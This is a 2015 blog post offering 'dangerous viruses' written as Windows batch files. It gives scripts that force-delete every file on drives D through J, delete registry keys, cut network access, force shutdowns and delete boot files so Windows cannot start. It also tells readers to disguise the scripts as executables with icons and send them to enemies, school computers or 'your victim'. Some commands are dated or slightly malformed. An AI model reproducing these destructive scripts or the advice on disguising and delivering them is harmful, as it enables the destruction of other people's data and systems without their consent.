Tuesday, September 15, 2015

Make Some Useful & Dangerous Viruses In Notepad!

Create Your Own Viruses

Today we will learn how to create simple but dangerous viruses using notepad. These are very simple to create and use, but don’t dare to use these on your computer because these viruses can destroy your personal information. Where to use? You can send these viruses to your enemies or if you wanna try it yourself best and my favorite place is school computers 😀 . Let’s get started.

How to make a virus ?
  1. Open Notepad
  2. Put The Codes Provided
  3. Save it in the correct extension
  4. Done
1. Deletes everything in the computer’s drive
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

Save As “Your File Name.bat [Batch File]


Registry Deleter
Deletes everything stored in registry
@echo OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
No Access

A good Halloween prank for your friends this stops internet access of the user. To gain Access type IPconfig /renew in CMD

@echo off
Ipconfig /release
Shut Up

Send your friend a little message and shut down his computer
@echo off
msg * Lets Roll Baby
shutdown -c “Error! Your ass got glued!” -s

Now its time for few very dangerous viruses

Rest In Peace

It crashes PC once used the PC can’t be restarted.. It deletes everything necessary for starting up windows. Do not use on yourself .

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Century

Shut downs the PC hundred times. To stop Start Run and type shutdown -a . You can also change the times pc restarts by replacing 100 by your choice.

Create a new shortcut and type :-
shutdown -s -t 100 c “Installing Updates”

How to make those stuff work ?

Download and run the converter.
Inject your batch file
Choose Icon
Version and information
Compile
Send to your victim
Enjoy

Download

SHARE BY GK
Computer Knowledge

No comments:

Post a Comment